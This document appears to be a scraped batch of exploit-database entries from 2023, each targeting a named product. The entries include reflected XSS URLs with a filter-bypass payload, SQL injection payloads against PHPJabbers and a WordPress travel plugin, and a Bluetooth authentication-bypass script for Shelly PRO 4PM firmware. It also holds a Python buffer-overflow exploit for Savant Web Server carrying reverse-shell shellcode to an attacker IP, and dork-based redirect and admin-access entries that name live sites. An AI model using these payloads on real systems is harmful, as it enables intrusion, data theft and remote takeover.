<pre><code># Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting<br /># Date: 2023.Aug.01<br /># Exploit Author: Pedro (ISSDU TW)<br /># Vendor Homepage: https://loganalyzer.adiscon.com/<br /># Software Link: https://loganalyzer.adiscon.com/download/<br /># Version: v4.1.13 and before<br /># Tested on: Linux<br /># CVE : CVE-2023-36306<br /><br />There are several installation method.<br />If you installed without database(File-Based),No need to login.<br />If you installed with database, You should login with Read Only User(at least)<br /><br />XSS Payloads are as below:<br /><br />XSS<br />http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E<br />http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123<br />http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E<br />http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E<br />http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E<br />http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E<br />http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E<br />http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E<br /> <br /><br /></code></pre>
<pre><code>#!/bin/bash<br /><br /># Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass<br /># Google Dork: NA<br /># Date: 2nd August 2023<br /># Exploit Author: The Security Team [exploitsecurity.io]<br /># Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability<br /># Vendor Homepage: https://www.shelly.com/<br /># Software Link: NA<br /># Version: Firmware v0.11.0 (REQUIRED)<br /># Tested on: MacOS/Linux<br /># CVE : CVE-2023-33383<br /><br />IFS=<br />failed=$false<br />RED="\e[31m"<br />GREEN="\e[92m"<br />WHITE="\e[97m"<br />ENDCOLOR="\e[0m"<br />substring="Connection refused"<br /><br /><br />banner()<br /> {<br /> clear<br /> echo -e "${GREEN}[+]*********************************************************[+]"<br /> echo -e "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |"<br /> echo -e "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |"<br /> echo -e "${GREEN}| CVE: CVE-2023-33383 |"<br /> echo -e "${GREEN}[+]*********************************************************[+]"<br /> echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"<br /> }<br /><br />banner<br />read -s -n 1 key<br />if [ "$key" = "x" ]; then<br /> exit 0;<br />elif [ "$key" = "" ]; then<br /> gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)<br /> if [ -z "$gattout" ]; then<br /> echo -e "${RED}Connection timed out${ENDCOLOR}"<br /> exit 0;<br /> else<br /> sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1<br /> echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"<br /> sleep 1<br /> if [ $? -eq 1 ]; then<br /> $failed=$true<br /> exit 0;<br /> fi<br /> sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1<br /> sleep 1<br /> if [ $? -eq 1 ]; then<br /> $failed=$true<br /> echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"<br /> exit 0;<br /> else<br /> sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1<br /> sleep 1<br /> for i in {1..5}<br /> do<br /> echo -ne "${GREEN}."<br /> sleep 1<br /> done<br /> echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"<br /> fi<br />fi<br />fi<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Web Portal People CMS v2.8 URL redirection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : webportalpeople.com ~ ourclassonline.com | <br />| # Dork : intext:''To obtain a site like this for your class visit www.ourclassonline.com.'' |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] use payload : /chat/chat/input.php3?D=10&From=https://cxsecurity.com/author/indoushka/1/&L=english&N=20&NT=1&O=1&PWD_Hash=32cc5886dc1fa8c106a02056292c4654&R=Default&ST=1&T=1&U=1&Ver=L<br /><br />[+] http://wths1958com/chat/chat/input.php3?D=10&From=https://cxsecurity.com/author/indoushka/1/&L=english&N=20&NT=1&O=1&PWD_Hash=32cc5886dc1fa8c106a02056292c4654&R=Default&ST=1&T=1&U=1&Ver=L<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Web Stock v3.0 Unauthorised Administrative Access Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : http://webstock.co.in/ | <br />| # Dork : Designed by Web Stock |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Allow view administrative interface.<br /><br />[+] use payload : /admin/admin-menu.php<br /><br />[+] http://lbcjagrancom/admin/admin-menu.php<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code># Exploit Title: WordPress adivaha Travel Plugin 2.3 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 29/07/2023<br /># Vendor: adivaha - Travel Tech Company<br /># Vendor Homepage: https://www.adivaha.com/<br /># Software Link: https://wordpress.org/plugins/adiaha-hotel/<br /># Demo: https://www.adivaha.com/demo/adivaha-online/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data, modification of<br />data and crash the application or make it unavailable, leading to lost revenue and<br />damage to a company's reputation.<br /><br /><br /><br />Path: /mobile-app/v3/<br /><br />GET parameter 'pid' is vulnerable to SQL Injection<br /><br />https://website/mobile-app/v3/?pid=[SQLI]&isMobile=chatbot<br /><br />---<br />Parameter: pid (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: pid=77A89299'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&isMobile=chatbot<br />---<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Bus Reservation System 1.1 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 20/07/2023<br /># Vendor: PHPJabbers<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/bus-reservation-system/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /># CVE: CVE-2023-4111<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data, modification of<br />data and crash the application or make it unavailable, leading to lost revenue and<br />damage to a company's reputation.<br /><br /><br /><br />Path: /index.php<br /><br />GET parameter 'pickup_id' is vulnerable to SQL Injection<br /><br />https://website/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=[SQLi]&session_id=<br /><br /><br />---<br />Parameter: pickup_id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=3 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&session_id=<br /><br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=3 AND 07569=7569&session_id=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (IF - comment)<br /> Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=3) AND IF(now()=sysdate(),SLEEP(5),0)-- wXyW&session_id=<br />---<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Academy LMS 6.0 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 22/07/2023<br /># Vendor: Creativeitem<br /># Vendor Homepage: https://creativeitem.com/<br /># Software Link: https://demo.creativeitem.com/academy/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site <br /># CVE: CVE-2023-4119<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /academy/home/courses<br /><br />GET parameter 'query' is vulnerable to XSS<br /><br />https://website/academy/home/courses?query=[XSS]<br /><br /><br />Path: /academy/home/courses<br /><br />GET parameter 'sort_by' is vulnerable to XSS<br /><br />https://website/academy/home/courses?category=web-design&price=all&level=all&language=all&rating=all&sort_by=[XSS]<br /><br /><br />XSS Payloads (Blocked) :<br /><br /><script>alert(1)</script><br />ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd<br /><br /><br />XSS Payload Bypass Filter : <br /><br />cplvz"><img src=a onerror=alert(1)>fk4ap<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Savant Web Server 3.1 - Remote Buffer Overflow (Egghunter)<br /># Date: [30/07/2023]<br /># Exploit Author: [0xBOF90]<br /># Vendor Homepage: [link]<br /># Version: [app version] (3.1)<br /># Tested on: [Windows 10]<br /><br />import socket<br />import sys<br /><br />try:<br /> server = b"192.168.56.102"<br /> #\x00\x0a\x0d\x25<br /> port = 80<br /> size = 253<br /> # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337<br />EXITFUNC=thread -f py –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25"<br /> buf = b""<br /> buf += b"\xdb\xc0\xd9\x74\x24\xf4\xbf\x57\xe2\x90\xa0\x58"<br /> buf += b"\x31\xc9\xb1\x52\x31\x78\x17\x83\xc0\x04\x03\x2f"<br /> buf += b"\xf1\x72\x55\x33\x1d\xf0\x96\xcb\xde\x95\x1f\x2e"<br /> buf += b"\xef\x95\x44\x3b\x40\x26\x0e\x69\x6d\xcd\x42\x99"<br /> buf += b"\xe6\xa3\x4a\xae\x4f\x09\xad\x81\x50\x22\x8d\x80"<br /> buf += b"\xd2\x39\xc2\x62\xea\xf1\x17\x63\x2b\xef\xda\x31"<br /> buf += b"\xe4\x7b\x48\xa5\x81\x36\x51\x4e\xd9\xd7\xd1\xb3"<br /> buf += b"\xaa\xd6\xf0\x62\xa0\x80\xd2\x85\x65\xb9\x5a\x9d"<br /> buf += b"\x6a\x84\x15\x16\x58\x72\xa4\xfe\x90\x7b\x0b\x3f"<br /> buf += b"\x1d\x8e\x55\x78\x9a\x71\x20\x70\xd8\x0c\x33\x47"<br /> buf += b"\xa2\xca\xb6\x53\x04\x98\x61\xbf\xb4\x4d\xf7\x34"<br /> buf += b"\xba\x3a\x73\x12\xdf\xbd\x50\x29\xdb\x36\x57\xfd"<br /> buf += b"\x6d\x0c\x7c\xd9\x36\xd6\x1d\x78\x93\xb9\x22\x9a"<br /> buf += b"\x7c\x65\x87\xd1\x91\x72\xba\xb8\xfd\xb7\xf7\x42"<br /> buf += b"\xfe\xdf\x80\x31\xcc\x40\x3b\xdd\x7c\x08\xe5\x1a"<br /> buf += b"\x82\x23\x51\xb4\x7d\xcc\xa2\x9d\xb9\x98\xf2\xb5"<br /> buf += b"\x68\xa1\x98\x45\x94\x74\x0e\x15\x3a\x27\xef\xc5"<br /> buf += b"\xfa\x97\x87\x0f\xf5\xc8\xb8\x30\xdf\x60\x52\xcb"<br /> buf += b"\x88\x4e\x0b\xeb\x2d\x27\x4e\x0b\xab\x8e\xc7\xed"<br /> buf += b"\xd9\xe0\x81\xa6\x75\x98\x8b\x3c\xe7\x65\x06\x39"<br /> buf += b"\x27\xed\xa5\xbe\xe6\x06\xc3\xac\x9f\xe6\x9e\x8e"<br /> buf += b"\x36\xf8\x34\xa6\xd5\x6b\xd3\x36\x93\x97\x4c\x61"<br /> buf += b"\xf4\x66\x85\xe7\xe8\xd1\x3f\x15\xf1\x84\x78\x9d"<br /> buf += b"\x2e\x75\x86\x1c\xa2\xc1\xac\x0e\x7a\xc9\xe8\x7a"<br /> buf += b"\xd2\x9c\xa6\xd4\x94\x76\x09\x8e\x4e\x24\xc3\x46"<br /> buf += b"\x16\x06\xd4\x10\x17\x43\xa2\xfc\xa6\x3a\xf3\x03"<br /> buf += b"\x06\xab\xf3\x7c\x7a\x4b\xfb\x57\x3e\x6b\x1e\x7d"<br /> buf += b"\x4b\x04\x87\x14\xf6\x49\x38\xc3\x35\x74\xbb\xe1"<br /> buf += b"\xc5\x83\xa3\x80\xc0\xc8\x63\x79\xb9\x41\x06\x7d"<br /> buf += b"\x6e\x61\x03"<br /><br /> httpMethod = b"\x31\xC9\x85\xC9\x0F\x84\x11" + b" /" # xor ecx, ecx; test<br />ecx, ecx; je 0x17<br /><br /> egghunter =<br /> b"\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53\x53"<br /> egghunter +=<br />b"\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08\x3c"<br /> egghunter +=<br />b"\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75\xd7"<br /> egghunter += b"\xff\xe7"<br /><br /> inputBuffer = b"\x90"*10+egghunter<br /> inputBuffer += b"\x41" * (size-len(egghunter)-10)<br /> inputBuffer += b"\x74\x86\x41"#0x00418674<br /> httpEndRequest = b"\r\n\r\n"<br /> shellcode = b"w00tw00t"+buf<br /> buf = httpMethod + inputBuffer + httpEndRequest +shellcode<br /> print("Sending evil buffer...")<br /> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> s.connect((server, port))<br /> s.send(buf)<br /> s.close()<br /><br /> print("Done!")<br /><br />except socket.error:<br /> print("Could not connect!")<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Rental Property Booking 2.0 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 22/07/2023<br /># Vendor: PHPJabbers<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/rental-property-booking-calendar/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4117<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /index.php<br /><br />GET parameter 'index' is vulnerable to RXSS<br /><br />https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Taxi Booking 2.0 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 22/07/2023<br /># Vendor: PHPJabbers<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/taxi-booking-script/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4116<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br /><br />Path: /index.php<br /><br />GET parameter 'index' is vulnerable to RXSS<br /><br />https://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=[XSS]<br /><br /><br />[-] Done<br /></code></pre>